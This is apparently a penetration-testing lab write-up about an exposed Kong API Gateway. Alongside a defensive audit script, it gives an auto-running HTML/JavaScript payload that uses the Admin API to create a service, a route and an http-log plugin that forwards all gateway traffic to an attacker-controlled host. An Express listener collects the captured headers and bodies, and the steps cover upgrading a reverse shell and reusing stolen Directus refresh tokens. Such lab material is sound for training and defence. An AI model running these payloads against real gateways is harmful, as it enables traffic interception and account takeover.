13.7.1

R3zk0n · October 2, 2025


    The current reverse shell isn’t fully interactive and can cause the gateway to hang. Upgrade to a fully interactive shell.

    With the other plugins available in Kong API Gateway, find a way to log all traffic passing through the gateway. Inspect the traffic for any sensitive data. You should only need five to ten minutes' worth of logging. The logging plugin can be disabled by sending a GET request to /plugins to get the plugin's id, then sending a DELETE request to /plugins/{id}. Review the authentication documentation for Directus and use the logged data to gain access to a valid access token for Directus.
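
The cleanup step above (GET /plugins to find the plugin's id, then DELETE /plugins/{id}) also works as an audit of the gateway. The following is an added example, not part of the original write-up: it scans a parsed `/plugins` response for logging plugins whose destination is outside an allow-list and returns the DELETE path for each. The function name, the allow-list and the sample data are assumptions made for illustration.

```javascript
'use strict';
// Kong logging plugins and the config field naming their destination.
const LOG_PLUGINS = new Map([
  ['http-log', (c) => new URL(c.http_endpoint).hostname],
  ['tcp-log', (c) => c.host],
  ['udp-log', (c) => c.host],
]);

// pluginsResponse: parsed JSON body of GET /plugins, shaped { data: [...] }.
// allowedHosts: hypothetical allow-list of approved log collectors.
function findRogueLogPlugins(pluginsResponse, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const findings = [];
  for (const plugin of pluginsResponse.data || []) {
    const getHost = LOG_PLUGINS.get(plugin.name);
    if (!getHost) continue; // not a logging plugin tracked here
    let host;
    try {
      host = String(getHost(plugin.config || {}) ?? '(missing)').toLowerCase();
    } catch (err) {
      host = '(unparseable)'; // malformed endpoint is still reported
    }
    if (allowed.has(host)) continue;
    findings.push({
      id: plugin.id,
      name: plugin.name,
      host,
      // No service/route/consumer scope means it sees all gateway traffic.
      global: !plugin.service && !plugin.route && !plugin.consumer,
      deletePath: `/plugins/${encodeURIComponent(plugin.id)}`,
    });
  }
  return findings;
}

// Constructed sample response; the first entry mirrors the plugin on this page.
const SAMPLE = {
  data: [
    { id: '00000000-0000-4000-8000-000000000001', name: 'http-log',
      service: null, route: null, consumer: null,
      config: { http_endpoint: 'http://192.168.119.142:8000/callback' } },
    { id: '00000000-0000-4000-8000-000000000002', name: 'http-log',
      service: { id: 'svc-1' }, route: null, consumer: null,
      config: { http_endpoint: 'https://logs.internal.example/ingest' } },
    { id: '00000000-0000-4000-8000-000000000003', name: 'key-auth', config: {} },
  ],
};

console.log(findRogueLogPlugins(SAMPLE, ['logs.internal.example']));
```

Each finding's `deletePath` is the path to send the DELETE request to on the Admin API once the plugin is confirmed as unwanted.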

    Solution

    • Use the Perl shell that is available on the microservice (BusyBox)
    • Use the following payload to enable logging and capture sensitive data

    ```html
    <html>
    <head>
    <script>

    // Step 1: register a service on the Kong Admin API (port 8001).
    function createService() {
        fetch("http://172.16.16.6:8001/services", {
          method: "post",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({"name":"supersecret", "url": "http://127.0.0.1/"})
        }).then(function (route) {
          createRoute();
        });
    }

    // Step 2: attach a route to the new service.
    function createRoute() {
        fetch("http://172.16.16.6:8001/services/supersecret/routes", {
          method: "post",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({"paths": ["/supersecret"]})
        }).then(function (plugin) {
          createPlugin();
        });
    }

    // Step 3: enable the http-log plugin, pointing it at the listener on port 8000.
    function createPlugin() {
        fetch("http://172.16.16.6:8001/plugins", {
          method: "post",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({"name":"http-log", "config" :{"http_endpoint": "http://192.168.119.142:8000/callback"}})
        }).then(function (callback) {
          // Signal that setup has finished.
          fetch("http://192.168.119.142/callback?setupComplete");
        });
    }
    </script>
    </head>
    <body onload='createService()'>
    <div></div>
    </body>
    </html>
    ```

    • Access the Directus server using the refresh token
    
      + Node server to receive incoming connections

    ```javascript
    var express = require('express');
    var app = express();
    // Parse JSON request bodies so the logged entries arrive as objects.
    app.use(express.json());

    // Print the headers and body of every log entry posted to /callback.
    app.post('/callback', function(req, res){
      console.log("=====================================");
      console.log("REQUEST HEADERS");
      console.log(req.headers);
      console.log("REQUEST BODY");
      console.log(req.body);
      console.log("=====================================");
      res.send('OK');
    });

    // Listen on the port named in the plugin's http_endpoint.
    app.listen(8000);
    ```
